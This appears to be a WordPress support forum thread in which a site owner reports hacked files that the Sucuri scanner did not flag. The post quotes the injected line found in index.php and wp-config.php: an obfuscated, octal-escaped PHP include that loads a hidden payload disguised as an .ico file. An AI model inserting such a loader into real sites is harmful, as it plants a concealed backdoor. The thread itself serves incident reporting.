I see hacked code but Sucuri says files are all OK

  • WPChina

    (@wordpresschina)


    3 years, 10 months ago

    My sucuri says “All Core WordPress Files Are Correct” but I found somehow hacker added a directory called /journal/ to the installation and also added the following code to the top of index.php and wp-config.php:

    /*0d5c6*/
@include "\057home\057mysitename\160ubli\143_htm\154/wp-\151nclu\144es/j\163/jqu\145ry/.\14583d0\06246.i\143o";
/*0d5c6*/

    I decoded it and deleted the file from wp-includes/js/jquery/.e83d0246.ico

    But why does Sucuri not understand these files are changed?

Viewing 1 replies (of 1 total)
  • Thread Starter WPChina

    (@wordpresschina)

    Any update? I see this on multiple boxes running different ubuntu/centos in different geographic locations running different types of themes/plugins. So there seems to be no similarities. Seems not too much online about this type of issue?

Viewing 1 replies (of 1 total)
  • The topic ‘I see hacked code but Sucuri says files are all OK’ is closed to new replies.